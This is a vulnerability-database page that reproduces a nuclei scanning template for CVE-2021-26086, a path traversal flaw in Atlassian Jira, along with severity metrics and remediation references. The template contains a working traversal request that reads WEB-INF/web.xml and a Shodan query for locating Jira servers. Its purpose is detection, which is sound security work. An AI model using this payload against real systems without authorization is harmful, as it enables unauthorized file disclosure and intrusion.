Lucene search

K

Atlassian Jira Limited - Local File Inclusion

πŸ—“οΈΒ 26 Aug 2021Β 03:56:45Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 39Β Views

Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. Apply security patches to mitigate this vulnerability

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
id: CVE-2021-26086

info:
  name: Atlassian Jira Limited -  Local File Inclusion
  author: cocxanh
  severity: medium
  description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
  impact: |
    This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-72695
    - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26086
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Jeromeyoung/CVE-2021-26086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-26086
    cwe-id: CWE-22
    epss-score: 0.91202
    epss-percentile: 0.98861
    cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_data_center
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <web-app
          - </web-app>
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d6aa8f8ca689daf8f8e23c5fe0161cfda28363b48b7760d60b77ec36a5f122ee0220606b74a1793b9385612c03afb498f76238d46a16656f9c184a41d731fce0327e:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Aug 2021 03:45Current
5.3Medium risk
Vulners AI Score5.3
CVSS25
CVSS35.3
EPSS0.94247
39
.json
Report